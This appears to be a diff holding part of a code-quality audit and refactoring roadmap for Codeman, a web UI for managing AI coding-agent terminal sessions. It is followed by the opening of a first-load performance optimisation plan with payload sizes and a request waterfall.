||||
```typescript
|
||||
// types.ts (manual interface)
|
||||
export interface CreateSessionRequest {
|
||||
workingDir?: string;
|
||||
mode?: SessionMode;
|
||||
name?: string;
|
||||
}
|
||||
|
||||
// schemas.ts (manual Zod schema - duplicated!)
|
||||
export const CreateSessionSchema = z.object({
|
||||
workingDir: safePathSchema.optional(),
|
||||
mode: z.enum(['claude', 'shell', 'opencode']).optional(),
|
||||
name: z.string().max(100).optional(),
|
||||
});
|
||||
```
|
||||
|
||||
### Fix
|
||||
|
||||
Use `z.infer` to derive TypeScript types from Zod schemas (single source of truth):
|
||||
|
||||
```typescript
|
||||
// schemas.ts
|
||||
export const CreateSessionSchema = z.object({
|
||||
workingDir: safePathSchema.optional(),
|
||||
mode: z.enum(['claude', 'shell', 'opencode']).optional(),
|
||||
name: z.string().max(100).optional(),
|
||||
});
|
||||
|
||||
// types.ts (auto-derived)
|
||||
export type CreateSessionRequest = z.infer<typeof CreateSessionSchema>;
|
||||
```
|
||||
|
||||
**Affected schemas** (~10):
|
||||
- CreateSessionSchema
|
||||
- RunPromptSchema
|
||||
- ResizeSchema
|
||||
- CreateCaseSchema
|
||||
- QuickStartSchema
|
||||
- HookEventSchema
|
||||
- RespawnConfigSchema
|
||||
- ConfigUpdateSchema
|
||||
- SettingsUpdateSchema
|
||||
|
||||
---
|
||||
|
||||
## 8. High: Test Coverage Gaps
|
||||
|
||||
**Severity**: HIGH
|
||||
**Impact**: Critical code paths untested. Regressions go unnoticed.
|
||||
|
||||
### Untested Source Files
|
||||
|
||||
| File | Lines | Risk |
|
||||
|------|-------|------|
|
||||
| `src/web/server.ts` | 6,736 | CRITICAL - Core REST API, 280+ routes |
|
||||
| `src/plan-orchestrator.ts` | ~500 | HIGH - Multi-agent plan generation |
|
||||
| `src/tunnel-manager.ts` | ~200 | MEDIUM - Cloudflare tunnel |
|
||||
| `src/session-lifecycle-log.ts` | ~150 | MEDIUM - JSONL audit log |
|
||||
| `src/ai-plan-checker.ts` | ~300 | MEDIUM - Plan completion detection |
|
||||
| `src/templates/claude-md.ts` | ~200 | LOW - CLAUDE.md generation |
|
||||
| `src/utils/claude-cli-resolver.ts` | ~100 | LOW - CLI path resolution |
|
||||
| `src/utils/opencode-cli-resolver.ts` | ~100 | LOW - OpenCode CLI support |
|
||||
| `src/utils/regex-patterns.ts` | ~100 | LOW - Used everywhere! |
|
||||
| `src/utils/token-validation.ts` | ~50 | LOW - Token counting |
|
||||
|
||||
### Test Quality Issues
|
||||
|
||||
**10 "not.toThrow()" tests without behavior verification**:
|
||||
```typescript
|
||||
// BAD: Only checks it doesn't crash
|
||||
expect(() => tracker.processMessage(null)).not.toThrow();
|
||||
|
||||
// GOOD: Also verify defensive behavior
|
||||
expect(() => tracker.processMessage(null)).not.toThrow();
|
||||
expect(tracker.getAllTasks().size).toBe(0);
|
||||
```
|
||||
|
||||
Locations:
|
||||
- `task-tracker.test.ts` - 5 instances
|
||||
- `image-watcher.test.ts` - 1 instance
|
||||
- `task-queue.test.ts` - 1 instance
|
||||
- Others scattered
|
||||
|
||||
---
|
||||
|
||||
## 9. High: Duplicated Test Mocks
|
||||
|
||||
**Severity**: HIGH
|
||||
**Impact**: Mock changes need updating in 4 places. Inconsistent mock behavior.
|
||||
|
||||
### MockSession Defined 4 Times
|
||||
|
||||
| File | Usage |
|
||||
|------|-------|
|
||||
| `test/respawn-controller.test.ts` | Full mock with event emitter |
|
||||
| `test/session-manager.test.ts` | Simpler mock |
|
||||
| `test/respawn-team-awareness.test.ts` | Copy of respawn-controller mock |
|
||||
| `test/respawn-test-utils.ts` | **Comprehensive mock - UNUSED!** |
|
||||
|
||||
### MockStateStore Defined 2 Times
|
||||
|
||||
| File | Usage |
|
||||
|------|-------|
|
||||
| `test/session-manager.test.ts` | Basic mock |
|
||||
| `test/ralph-loop.test.ts` | Separate implementation |
|
||||
|
||||
### Unused Test Utilities
|
||||
|
||||
`test/respawn-test-utils.ts` exports these utilities that **no test file imports**:
|
||||
- `createTimeController()` - Abstraction over vitest fake timers
|
||||
- `MockAiIdleChecker` - Fully mocked AI idle checker
|
||||
- `MockAiPlanChecker` - Fully mocked plan checker
|
||||
- Factory functions for pre-configured controllers
|
||||
|
||||
### Fix
|
||||
|
||||
Create `test/mocks/` directory:
|
||||
```
|
||||
test/
|
||||
├── mocks/
|
||||
│ ├── mock-session.ts (single MockSession, used everywhere)
|
||||
│ ├── mock-state-store.ts (single MockStateStore)
|
||||
│ └── index.ts (barrel export)
|
||||
├── utils/
|
||||
│ └── time-controller.ts (from respawn-test-utils.ts)
|
||||
└── ... test files
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 10. Medium: Hardcoded Magic Values
|
||||
|
||||
**Severity**: MEDIUM
|
||||
**Impact**: Hard to tune, inconsistent when same value appears in multiple places.
|
||||
|
||||
### Already Centralized (Good)
|
||||
|
||||
- `src/config/buffer-limits.ts` - All buffer sizes
|
||||
- `src/config/map-limits.ts` - All collection limits
|
||||
|
||||
### NOT Centralized (40+ values scattered)
|
||||
|
||||
**In server.ts** (lines 145-194):
|
||||
```typescript
|
||||
const TASK_UPDATE_BATCH_INTERVAL = 100;
|
||||
const STATE_UPDATE_DEBOUNCE_INTERVAL = 500;
|
||||
const SESSIONS_LIST_CACHE_TTL = 1000;
|
||||
const SCHEDULED_CLEANUP_INTERVAL = 5 * 60 * 1000;
|
||||
const SSE_HEALTH_CHECK_INTERVAL = 30 * 1000;
|
||||
const MAX_TERMINAL_COLS = 500;
|
||||
const MAX_TERMINAL_ROWS = 200;
|
||||
const AUTH_SESSION_TTL_MS = 24 * 60 * 60 * 1000;
|
||||
const MAX_AUTH_SESSIONS = 100;
|
||||
const AUTH_FAILURE_WINDOW_MS = 15 * 60 * 1000;
|
||||
const STATS_COLLECTION_INTERVAL_MS = 2000;
|
||||
const MAX_INPUT_LENGTH = 64 * 1024;
|
||||
```
|
||||
|
||||
**In hooks-config.ts**: `timeout: 10000` hardcoded 6 times.
|
||||
|
||||
**In respawn-controller.ts** (lines 538-565): 10 timing constants.
|
||||
|
||||
**In utils**: `EXEC_TIMEOUT_MS = 5000` duplicated in both `claude-cli-resolver.ts` and `opencode-cli-resolver.ts`.
|
||||
|
||||
**In app.js**:
|
||||
```javascript
|
||||
// line 27: 600000 - stuck detection threshold
|
||||
// line 24: 5000 - default scrollback
|
||||
// lines 34-35: 128*1024, 256*1024 - chunk sizes
|
||||
// lines 152-155: 150, 100 - keyboard detection thresholds
|
||||
// lines 573-575: 80, 300, 100 - swipe detection params
|
||||
```
|
||||
|
||||
### Fix
|
||||
|
||||
Create additional config files:
|
||||
```
|
||||
src/config/
|
||||
├── buffer-limits.ts (existing)
|
||||
├── map-limits.ts (existing)
|
||||
├── server-config.ts (NEW - web server intervals, auth, caching)
|
||||
├── timing-config.ts (NEW - debounce delays, check intervals)
|
||||
└── terminal-config.ts (NEW - max cols/rows, batch intervals)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 11. Medium: Frontend Global State Monolith
|
||||
|
||||
**Severity**: MEDIUM
|
||||
**Impact**: All state in single CodemanApp class. Tight coupling between unrelated systems.
|
||||
|
||||
### 60+ State Variables in CodemanApp Constructor (lines 2667-2805)
|
||||
|
||||
```javascript
|
||||
this.sessions = new Map(); // Session data
|
||||
this.subagents = new Map(); // Agent tracking
|
||||
this.subagentActivity = new Map(); // Tool call tracking
|
||||
this.subagentToolResults = new Map(); // Result caching
|
||||
this.subagentParentMap = new Map(); // Agent-to-session mapping
|
||||
this.teams = new Map(); // Team tracking
|
||||
this.teamTasks = new Map(); // Team task state
|
||||
this.planSubagents = new Map(); // Plan agent tracking
|
||||
this.pendingWrites = []; // Terminal write queue
|
||||
this.terminalBufferCache = new Map(); // Buffer caching (unbounded!)
|
||||
this.projectInsights = new Map(); // Bash tool insights
|
||||
// ... 40+ more
|
||||
```
|
||||
|
||||
### Problems
|
||||
|
||||
1. **18 Map instances** with complex cross-references (no garbage collection strategy)
|
||||
2. **No domain separation**: Session, subagent, notification, UI, and network state mixed
|
||||
3. **Implicit dependencies**: `selectSession()` requires 5+ Maps to be in consistent state
|
||||
4. **`terminalBufferCache`** has no max size - can grow unbounded with many sessions
|
||||
|
||||
### Recommended Domain Split
|
||||
|
||||
```javascript
|
||||
// Instead of 60+ flat properties:
|
||||
class SessionState {
|
||||
sessions = new Map();
|
||||
sessionOrder = [];
|
||||
terminalBuffers = new Map();
|
||||
tabAlerts = new Map();
|
||||
}
|
||||
|
||||
class SubagentState {
|
||||
subagents = new Map();
|
||||
activity = new Map();
|
||||
parentMap = new Map();
|
||||
windows = new Map();
|
||||
minimized = new Map();
|
||||
}
|
||||
|
||||
class TeamState {
|
||||
teams = new Map();
|
||||
tasks = new Map();
|
||||
teammates = new Map();
|
||||
}
|
||||
|
||||
class UIState {
|
||||
activeSessionId = null;
|
||||
draggedTabId = null;
|
||||
isLoadingBuffer = false;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 12. Medium: Frontend Code Duplication
|
||||
|
||||
**Severity**: MEDIUM
|
||||
**Impact**: Repeated patterns increase maintenance burden and inconsistency risk.
|
||||
|
||||
### Duplicated Patterns
|
||||
|
||||
**API fetch calls** (~50 instances):
|
||||
```javascript
|
||||
// Repeated everywhere:
|
||||
fetch(`/api/sessions/${sessionId}/...`, {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({...})
|
||||
}).catch(() => {})
|
||||
```
|
||||
**Fix**: Extract `ApiClient` class.
|
||||
|
||||
**`innerHTML` usage** (104 instances):
|
||||
- Mix of template strings, createElement chains, and direct innerHTML
|
||||
- Some with manual XSS escaping (`text.replace(/</g, '<')`), some without
|
||||
- No consistent DOM creation pattern
|
||||
|
||||
**`typeof app !== 'undefined'` checks** (20+ instances):
|
||||
- Lines 458, 467, 481, 614, 617, 1549, etc.
|
||||
- **Fix**: Ensure `app` is always defined as global singleton.
|
||||
|
||||
**Element visibility toggling** (212+ occurrences):
|
||||
```javascript
|
||||
element.classList.add('active')
|
||||
element.classList.remove('active')
|
||||
```
|
||||
**Fix**: Create `toggleClass(el, className, condition)` utility.
|
||||
|
||||
### Event Listener Issues
|
||||
|
||||
- **152 `addEventListener` calls** with fragile cleanup
|
||||
- **Mix of inline (`onclick="app.method()"`) and addEventListener** - hard to track
|
||||
- **Element cache (`_elemCache`) never invalidated** if DOM elements are recreated (line 2808)
|
||||
- **Tab drag-and-drop listeners** may not clean up if user switches tabs mid-drag
|
||||
|
||||
---
|
||||
|
||||
## 13. Medium: Inconsistent Logging
|
||||
|
||||
**Severity**: MEDIUM
|
||||
**Impact**: Hard to debug in production. Can't filter by severity or component.
|
||||
|
||||
### Current State
|
||||
|
||||
- **345 console calls** across source files
|
||||
- **No structured logging** - all `console.log/error` directly
|
||||
- **No log levels** (DEBUG, INFO, WARN, ERROR)
|
||||
|
||||
### Inconsistent Prefixes
|
||||
|
||||
```typescript
|
||||
// Some files use brackets:
|
||||
console.log('[Session] Starting interactive...');
|
||||
console.log('[RalphLoop] Task assigned...');
|
||||
console.log('[TunnelManager] Tunnel started');
|
||||
|
||||
// Others use no prefix:
|
||||
console.error('Failed to spawn PTY:', err);
|
||||
console.log('Server listening on port', port);
|
||||
```
|
||||
|
||||
### Positive: CleanupManager Has Debug Mode
|
||||
|
||||
`src/utils/cleanup-manager.ts` has a `debugMode` flag for conditional debug logging - good pattern not replicated elsewhere.
|
||||
|
||||
### Fix
|
||||
|
||||
Either:
|
||||
1. Enforce consistent `[ComponentName]` prefixes via lint rule
|
||||
2. Create lightweight logger abstraction (not a heavy framework)
|
||||
|
||||
---
|
||||
|
||||
## 14. Medium: Utils Barrel Export Gaps
|
||||
|
||||
**File**: `src/utils/index.ts`
|
||||
**Severity**: MEDIUM
|
||||
**Impact**: Forces deep imports, unclear public API.
|
||||
|
||||
### Missing Exports
|
||||
|
||||
These functions are defined but NOT exported from the barrel:
|
||||
- `createAnsiPatternFull()` and `createAnsiPatternSimple()` (factory functions from `regex-patterns.ts`)
|
||||
- `SAFE_PATH_PATTERN` (from `regex-patterns.ts`)
|
||||
- `validateTokenCounts()` and `validateTokensAndCost()` (from `token-validation.ts`)
|
||||
- `isSimilar()`, `isSimilarByDistance()`, `levenshteinDistance()`, `normalizePhrase()` (from `string-similarity.ts` - though some are dead code, see finding #16)
|
||||
|
||||
### Deep Import Anti-Pattern (16 instances)
|
||||
|
||||
Some files bypass the barrel unnecessarily:
|
||||
```typescript
|
||||
// Could use barrel:
|
||||
import { BufferAccumulator } from './utils/buffer-accumulator.js';
|
||||
import { LRUMap } from './utils/lru-map.js';
|
||||
|
||||
// Must deep import (not in barrel):
|
||||
import { SAFE_PATH_PATTERN } from './utils/regex-patterns.js';
|
||||
```
|
||||
|
||||
### Fix
|
||||
|
||||
Add missing exports to `src/utils/index.ts` and update import sites.
|
||||
|
||||
---
|
||||
|
||||
## 15. Medium: Non-Null Assertion Risks
|
||||
|
||||
**Severity**: MEDIUM
|
||||
**Impact**: Runtime crashes if assumptions violated. 37 instances found.
|
||||
|
||||
### Distribution
|
||||
|
||||
| File | Count | Risk Level |
|
||||
|------|-------|------------|
|
||||
| `src/web/server.ts` | 10 | Low (auth flow verified) |
|
||||
| `src/session.ts` | 6 | **High** (mux/terminal refs) |
|
||||
| `src/respawn-controller.ts` | 4 | Low (config validated) |
|
||||
| `src/lru-map.ts` | 3 | Low (checked lookups) |
|
||||
| `src/subagent-watcher.ts` | 2 | Low (pending tool calls) |
|
||||
| Others | 12 | Low |
|
||||
|
||||
### High-Risk Examples (session.ts)
|
||||
|
||||
```typescript
|
||||
// Line 915 - _mux could be null if startInteractive called during cleanup
|
||||
`[Session] Starting interactive (with ${this._mux!.backend})`
|
||||
|
||||
// Line 954 - _muxSession could be null in race condition
|
||||
this._muxSession!.muxName
|
||||
```
|
||||
|
||||
### Fix
|
||||
|
||||
Add null guards before assertions, or document invariants:
|
||||
```typescript
|
||||
// Before:
|
||||
this._mux!.backend
|
||||
|
||||
// After:
|
||||
if (!this._mux) throw new Error('Invariant: _mux must be initialized before startInteractive');
|
||||
this._mux.backend
|
||||
```
|
||||
|
||||
### Positive Notes
|
||||
|
||||
- **0 instances of `as any`**
|
||||
- **0 instances of `@ts-ignore` or `@ts-expect-error`**
|
||||
- TypeScript overall score: 8.5/10
|
||||
|
||||
---
|
||||
|
||||
## 16. Low: Dead Utility Functions
|
||||
|
||||
**File**: `src/utils/string-similarity.ts`
|
||||
**Severity**: LOW
|
||||
**Impact**: Code clutter, confusion about what's actually used.
|
||||
|
||||
### Unused Functions
|
||||
|
||||
These are defined and exported but **never imported anywhere**:
|
||||
- `isSimilar(a, b, threshold)` - similarity check with threshold
|
||||
- `isSimilarByDistance(a, b, maxDistance)` - Levenshtein-based check
|
||||
- `levenshteinDistance(a, b)` - raw edit distance
|
||||
- `normalizePhrase(phrase)` - phrase normalization
|
||||
|
||||
### Actually Used
|
||||
|
||||
Only these are imported from the barrel:
|
||||
- `stringSimilarity()` - used in ralph-tracker.ts
|
||||
- `fuzzyPhraseMatch()` - used in ralph-tracker.ts
|
||||
- `todoContentHash()` - used in ralph-tracker.ts
|
||||
|
||||
### Fix
|
||||
|
||||
Delete unused functions or mark as `@internal` if kept for future use.
|
||||
|
||||
---
|
||||
|
||||
## 17. Low: No Dependency Injection for File I/O
|
||||
|
||||
**Severity**: LOW (practical impact limited at current scale)
|
||||
**Impact**: Can't mock filesystem for unit tests. 68+ hard-coded filesystem calls.
|
||||
|
||||
### Examples
|
||||
|
||||
```typescript
|
||||
// state-store.ts - directly imports and uses fs
|
||||
import { readFileSync, writeFileSync, existsSync, mkdirSync } from 'node:fs';
|
||||
|
||||
// push-store.ts - hard-coded paths
|
||||
const KEYS_FILE = join(DATA_DIR, 'push-keys.json');
|
||||
const SUBS_FILE = join(DATA_DIR, 'push-subscriptions.json');
|
||||
|
||||
// ai-checker-base.ts - direct execSync
|
||||
execSync(`tmux kill-session -t "${this.checkMuxName}"`, { timeout: 3000 });
|
||||
```
|
||||
|
||||
### Why This Is Lower Priority
|
||||
|
||||
- The codebase uses integration tests (spawning real processes/tmux sessions) rather than unit tests
|
||||
- Most filesystem operations are in infrastructure code, not business logic
|
||||
- Adding DI would be a large refactor with limited near-term benefit
|
||||
|
||||
---
|
||||
|
||||
## 18. Scorecard & Prioritized Roadmap
|
||||
|
||||
### Overall Scores (Post-Implementation)
|
||||
|
||||
| Category | Before | After | Notes |
|
||||
|----------|--------|-------|-------|
|
||||
| TypeScript Safety | 8.5/10 | 9/10 | 0 `any`, 0 `@ts-ignore`, Zod `z.infer` eliminates type drift |
|
||||
| Error Handling | 8/10 | 8/10 | Unchanged — already strong |
|
||||
| Async/Promise Safety | 9.5/10 | 9.5/10 | Unchanged — already strong |
|
||||
| Resource Cleanup | 7/10 | 8/10 | CleanupManager adopted in server.ts, subagent-watcher, bash-tool-parser; Debouncer in 6 files. **Gaps**: respawn-controller (10+ manual timers) and ralph-tracker (2 manual timers) not migrated |
|
||||
| Module Organization | 5/10 | 8/10 | Routes extracted (12 modules), types split (14 domain files), domain files split (ralph: 7, respawn: 5, session: 6) |
|
||||
| Test Coverage | 6/10 | 7.5/10 | Shared mock infrastructure, 12 route test files, MockSession/MockStateStore consolidated |
|
||||
| Config Centralization | 6/10 | 9/10 | 9 config files, ~65 constants centralized, 0 cross-file duplicates |
|
||||
| Frontend Architecture | 4/10 | 7/10 | 8 extracted modules (3,453 LOC), app.js reduced 24% (15.2K → 11.5K), xterm-zerolag-input vendor build |
|
||||
| Code Duplication | 5/10 | 8/10 | Debouncer utility, shared test mocks, barrel exports, config consolidation |
|
||||
|
||||
### Implementation Phases
|
||||
|
||||
**Phase 1 - Quick Wins (1-2 days)** ✅ COMPLETE
|
||||
1. ✅ Export missing functions from utils barrel (~30 min) — `createAnsiPatternFull`, `createAnsiPatternSimple`, `SAFE_PATH_PATTERN`, `validateTokenCounts`, `validateTokensAndCost` all now exported from `src/utils/index.ts`
|
||||
2. ✅ Delete dead utility functions (~15 min) — `isSimilar()` removed from `string-similarity.ts`; `levenshteinDistance()`, `isSimilarByDistance()`, `normalizePhrase()` made private (used internally by `fuzzyPhraseMatch`/`stringSimilarity`)
|
||||
3. ✅ Consolidate duplicated `EXEC_TIMEOUT_MS` constant (~15 min) — Created `src/config/exec-timeout.ts` as single source of truth; `claude-cli-resolver.ts`, `opencode-cli-resolver.ts`, and `tmux-manager.ts` all import from it
|
||||
4. ✅ Add `z.infer` to Zod schemas (~2 hours) — `src/web/schemas.ts` now has 36 `z.infer` type exports (lines 512-547) covering all schemas
|
||||
5. ✅ Fix 10 weak "not.toThrow()" tests (~1 hour) — All `not.toThrow()` calls now have behavior assertions: `task-tracker.test.ts` (6 instances all followed by state checks), `image-watcher.test.ts` (1 instance followed by length check), `session-manager.test.ts` (1 instance followed by count check)
|
||||
|
||||
**Phase 2 - CleanupManager & Debounce (2-3 days)** ✅ COMPLETE
|
||||
1. ✅ Create `Debouncer` utility class (~1 hour) — Created `src/utils/debouncer.ts` with `Debouncer` and `KeyedDebouncer` classes; exported from `src/utils/index.ts`
|
||||
2. ✅ Migrate all 8 files from manual debounce to Debouncer — `state-store.ts` (2 Debouncers), `push-store.ts` (1 Debouncer), `bash-tool-parser.ts` (1 Debouncer), `image-watcher.ts` (1 KeyedDebouncer), `subagent-watcher.ts` (2 KeyedDebouncers), `server.ts` (1 KeyedDebouncer for persist timers), `ralph-tracker.ts` (2 Debouncers replacing 4 manual fields: `_todoUpdateTimer`, `_loopUpdateTimer`, `_todoUpdatePending`, `_loopUpdatePending`)
|
||||
3. ✅ Migrate respawn-controller to CleanupManager — 10 manual timer fields replaced with single `CleanupManager` instance + `timerIds` Map. `startTrackedTimer()`/`cancelTrackedTimer()` preserved as wrappers for UI countdown display and timer events. `clearTimers()` uses dispose-and-recreate pattern for state transitions.
|
||||
4. ✅ Migrate server.ts timer cleanup to CleanupManager (~2 hours) — `private cleanup = new CleanupManager()` present; terminal batch timers and pending respawn starts left as manual Maps (complex lifecycle)
|
||||
5. ✅ Migrate remaining files — `bash-tool-parser.ts` (CleanupManager ✅), `subagent-watcher.ts` (CleanupManager ✅), `ralph-tracker.ts` (Debouncer ✅)
|
||||
|
||||
**Phase 3 - server.ts Route Extraction (3-4 days)** ✅ COMPLETE
|
||||
1. ✅ Created `src/web/routes/` with 12 domain route modules + index barrel (4,090 LOC total): session (909), system (768), ralph (533), plan (459), respawn (315), case, file, hook-event, mux, push, scheduled, team
|
||||
2. ✅ Created `src/web/middleware/auth.ts` (193 LOC) — Basic Auth, session cookies, rate limiting, security headers, CORS
|
||||
3. ✅ Created `src/web/ports/` with 7 typed port interfaces (142 LOC) — SessionPort, EventPort, RespawnPort, ConfigPort, InfraPort, AuthPort; routes declare dependencies via intersection types
|
||||
4. ✅ Created `src/web/route-helpers.ts` (154 LOC) — `findSessionOrFail()`, `formatUptime()`, `sanitizeHookData()`, `autoConfigureRalph()`
|
||||
5. ✅ Reduced `server.ts` from 6,736 → 2,697 LOC (60% reduction). Remaining LOC is justified infrastructure: session lifecycle, SSE broadcast engine, terminal batching, respawn integration, resource cleanup
|
||||
|
||||
**Phase 4 - Domain File Splitting (2-3 days)** ✅ COMPLETE
|
||||
1. ✅ Split `types.ts` into `src/types/` directory — 14 domain files (1,469 LOC total): common, session, task, app-state, respawn, ralph, api, lifecycle, run-summary, tools, teams, push, plan + index barrel. Original `types.ts` is now a 1-line re-export
|
||||
2. ✅ Split `ralph-tracker.ts` into 7 files (exceeded plan of 4) — ralph-tracker (2,391), ralph-plan-tracker (477), ralph-status-parser (552), ralph-fix-plan-watcher (366), ralph-stall-detector (166), ralph-config (153), ralph-loop (522)
|
||||
3. ✅ Split `respawn-controller.ts` into 5 files (exceeded plan of 3) — respawn-controller (3,228), respawn-health (229), respawn-metrics (229), respawn-patterns (131), respawn-adaptive-timing (134)
|
||||
4. ✅ Split `session.ts` into 6 files (exceeded plan of 3) — session (2,168), session-manager (298), session-auto-ops (284), session-cli-builder (132), session-task-cache (101), session-lifecycle-log (114)
|
||||
|
||||
**Phase 5 - Frontend Modularization (3-4 days)** ✅ COMPLETE
|
||||
1. ✅ Extracted `constants.js` (238 LOC) — shared constants, timing values, Z-index layers, `escapeHtml()`, `extractSyncSegments()`
|
||||
2. ✅ Extracted `mobile-handlers.js` (449 LOC) — `MobileDetection`, `KeyboardHandler`, `SwipeHandler`
|
||||
3. ✅ Extracted `voice-input.js` (853 LOC) — `DeepgramProvider`, `VoiceInput`
|
||||
4. ✅ Extracted `notification-manager.js` (445 LOC) — `NotificationManager` class (5-layer system)
|
||||
5. ✅ Extracted `keyboard-accessory.js` (279 LOC) — `KeyboardAccessoryBar`, `FocusTrap`
|
||||
6. ✅ Extracted `api-client.js` (70 LOC) — `_api()`, `_apiJson()`, `_apiPost()`, `_apiPut()`
|
||||
7. ✅ Extracted `subagent-windows.js` (1,119 LOC) — 13 subagent window methods
|
||||
8. ✅ Removed inlined xterm-zerolag-input copy → built to `vendor/xterm-zerolag-input.js` from `packages/xterm-zerolag-input/`
|
||||
9. ✅ Reduced `app.js` from ~15,200 → 11,473 LOC (24% reduction). All scripts loaded in correct dependency order in `index.html`
|
||||
|
||||
**Phase 6 - Config Consolidation (1 day)** ✅ COMPLETE
|
||||
1. ✅ Created 6 new domain-focused config files (better than plan's 2 generic files): `server-timing.ts` (13 constants), `auth-config.ts` (5 constants), `tunnel-config.ts` (8 constants), `terminal-limits.ts` (4 constants), `ai-defaults.ts` (3 constants), `team-config.ts` (3 constants)
|
||||
2. ✅ Total: 9 config files in `src/config/`, ~65 constants centralized
|
||||
3. ✅ Eliminated all cross-file duplicates: `STATS_COLLECTION_INTERVAL_MS` (was in 2 files), `timeout: 10000` (was 6× inline in hooks-config.ts → `HOOK_TIMEOUT_MS`), AI model string (was in 5 files → `AI_CHECK_MODEL`), `MAX_TRACKED_AGENTS` (was shadowed in subagent-watcher.ts)
|
||||
4. ✅ CLAUDE.md updated with config files table, import conventions, resource limits references
|
||||
|
||||
**Phase 7 - Test Infrastructure (2-3 days)** ✅ COMPLETE
|
||||
1. ✅ Created `test/mocks/` directory with 5 files (541 LOC): `mock-session.ts` (312), `mock-state-store.ts` (60), `mock-route-context.ts` (121), `test-helpers.ts` (37), `index.ts` (11 — barrel export)
|
||||
2. ✅ Consolidated MockSession into single shared definition — no duplicate class definitions remain (2 `vi.mock()`-based copies intentionally left in session-manager.test.ts and ralph-loop.test.ts)
|
||||
3. ✅ `respawn-test-utils.ts` converted to backward-compatibility shim — re-exports from `test/mocks/`, retains respawn-specific utilities (MockAiIdleChecker, TimeController, etc.)
|
||||
4. ✅ Created initial 3 route test files with 58 total tests: `session-routes.test.ts` (34 tests), `respawn-routes.test.ts` (13 tests), `system-routes.test.ts` (11 tests). Route test harness uses `app.inject()` — no real ports needed
|
||||
5. ✅ All 12 route modules now have dedicated test files in `test/routes/`: session, respawn, system, ralph, plan, push, team, mux, file, scheduled, hook-event, case
|
||||
|
||||
---
|
||||
|
||||
## Appendix: File Size Inventory (Post-Implementation)
|
||||
|
||||
### Before vs After
|
||||
|
||||
| File | Before | After | Change |
|
||||
|------|--------|-------|--------|
|
||||
| `src/web/server.ts` | 6,736 | 2,697 | **−60%** (routes, auth, ports extracted) |
|
||||
| `src/web/public/app.js` | 15,196 | 11,473 | **−24%** (8 modules extracted) |
|
||||
| `src/ralph-tracker.ts` | 3,905 | 2,391 | **−39%** (6 companion files extracted) |
|
||||
| `src/respawn-controller.ts` | 3,611 | 3,228 | **−11%** (4 companion files extracted) |
|
||||
| `src/session.ts` | 2,418 | 2,168 | **−10%** (5 companion files extracted) |
|
||||
| `src/types.ts` | 1,443 | 1 | **−99%** (14 domain files in `src/types/`) |
|
||||
|
||||
### New Infrastructure Created
|
||||
|
||||
| Directory | Files | Total LOC | Purpose |
|
||||
|-----------|-------|-----------|---------|
|
||||
| `src/web/routes/` | 13 | 4,090 | Domain route modules |
|
||||
| `src/web/ports/` | 7 | 142 | Port interfaces for DI |
|
||||
| `src/web/middleware/` | 1 | 193 | Auth middleware |
|
||||
| `src/types/` | 14 | 1,469 | Domain type files |
|
||||
| `src/config/` | 9 | ~450 | Centralized config |
|
||||
| `test/mocks/` | 5 | 541 | Shared test mocks |
|
||||
| `test/routes/` | 4 | ~500 | Route handler tests |
|
||||
|
||||
### Extracted Frontend Modules
|
||||
|
||||
| Module | Lines | Purpose |
|
||||
|--------|-------|---------|
|
||||
| `subagent-windows.js` | 1,119 | Subagent window management |
|
||||
| `voice-input.js` | 853 | DeepgramProvider, VoiceInput |
|
||||
| `mobile-handlers.js` | 449 | MobileDetection, KeyboardHandler, SwipeHandler |
|
||||
| `notification-manager.js` | 445 | 5-layer notification system |
|
||||
| `keyboard-accessory.js` | 279 | KeyboardAccessoryBar, FocusTrap |
|
||||
| `constants.js` | 238 | Shared constants, timing, Z-index |
|
||||
| `api-client.js` | 70 | API fetch wrapper |
|
||||
|
||||
### What's Working Well
|
||||
|
||||
These patterns should be **preserved, not refactored**:
|
||||
- Clean one-way dependency graph (no circular deps)
|
||||
- EventEmitter-based decoupling between domain models
|
||||
- Proper `import type` usage (19 files, consistent)
|
||||
- Utility type adoption (101 instances of Record, Partial, Omit, etc.)
|
||||
- `assertNever()` for exhaustive switch checking
|
||||
- `StaleExpirationMap` and `LRUMap` for bounded collections
|
||||
- State persistence circuit breaker pattern
|
||||
- TypeScript strict mode with all safety flags enabled
|
||||
- `CleanupManager` for centralized timer/watcher disposal
|
||||
- `Debouncer`/`KeyedDebouncer` for consistent debounce patterns
|
||||
- Port interfaces for route module dependency injection
|
||||
- `Object.assign(CodemanApp.prototype, ...)` for frontend module composition
|
||||
@@ -1,409 +0,0 @@
|
||||
# First-Load Performance Optimization Plan
|
||||
|
||||
**Date**: 2026-02-18
|
||||
**Audit by**: 4-agent team (css-analyst, js-analyst, server-analyst, deps-analyst)
|
||||
**Scope**: First browser load of Codeman web UI at `/`
|
||||
|
||||
---
|
||||
|
||||
## Current State (Baseline)
|
||||
|
||||
### Payload
|
||||
|
||||
| Asset | Raw | Compressed | Render-Blocking? |
|
||||
|-------|-----|-----------|-----------------|
|
||||
| `index.html` | 82 KB | ~15 KB | N/A (document) |
|
||||
| `styles.css` | 154 KB | ~25 KB | **YES** |
|
||||
| `mobile.css` | 34 KB | ~7 KB | **YES** (missing media query) |
|
||||
| `xterm.css` (CDN) | 2 KB | ~2 KB | No (preload pattern) |
|
||||
| `xterm.min.js` (CDN) | 67 KB | ~65 KB | No (defer) |
|
||||
| `xterm-addon-fit` (CDN) | 1 KB | ~1 KB | No (defer) |
|
||||
| `app.js` | 563 KB | ~126 KB | No (defer) |
|
||||
| **Total** | **903 KB** | **~241 KB** | |
|
||||
|
||||
### Request Waterfall (13 requests on first load)
|
||||
|
||||
```
|
||||
T=0 GET / (82KB doc)
|
||||
T+20ms ├── styles.css?v=0.1536 (154KB — BLOCKS RENDER)
|
||||
├── mobile.css?v=0.1536 (34KB — BLOCKS RENDER on all viewports!)
|
||||
├── xterm.css (CDN, preloaded) (2KB — non-blocking, already async)
|
||||
├── xterm.min.js (CDN, defer) (67KB)
|
||||
├── xterm-addon-fit.min.js (CDN) (1KB)
|
||||
└── app.js?v=0.1536 (defer) (563KB)
|
||||
|
||||
[FIRST PAINT blocked by: styles.css + mobile.css]
|
||||
|
||||
T+200ms JS execution starts
|
||||
├── new Terminal() + terminal.open() ← HEAVY sync (canvas creation)
|
||||
├── connectSSE() → /api/events ← SSE stream
|
||||
├── loadState() → /api/status ← DUPLICATE of SSE init!
|
||||
├── loadQuickStartCases()
